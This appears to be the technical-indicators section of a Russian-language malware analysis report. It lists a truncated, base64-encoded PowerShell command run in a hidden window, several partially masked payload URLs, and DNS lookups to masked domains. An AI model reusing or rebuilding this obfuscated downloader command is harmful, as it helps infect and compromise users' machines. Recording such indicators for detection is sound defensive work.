Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABEAGEAbQB5ADMAZwBnAD0AKAAnAFkAJwArACgAJwB5ACcAKwAnADMAawAnACkAKwAoACcANQBfACcAKwAnADkAJwApACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABFAE4AVgA6AFUAUw...
- http://sk###kam.com/blog/80cpP/
- http://sh##.#ihchina.com/validators/smjsb/
- http://vz#####rnational.com.br/wp-content/GeaNtEsv/
- http://gl####hotsale.su/
- DNS ASK sk###kam.com
- DNS ASK sh##.#ihchina.com
- DNS ASK en##ra.in
- DNS ASK is###anone.com
- DNS ASK ti###pps.com
- DNS ASK bl#####.inovany.com.br
- DNS ASK vz#####rnational.com.br
- DNS ASK gl####hotsale.su
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABEAGEAbQB5ADMAZwBnAD0AKAAnAFkAJwArACgAJwB5ACcAKwAnADMAawAnACkAKwAoACcANQBfACcAKwAnADkAJwApACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABFAE4AVgA6AFUAUw...' (со скрытым окном)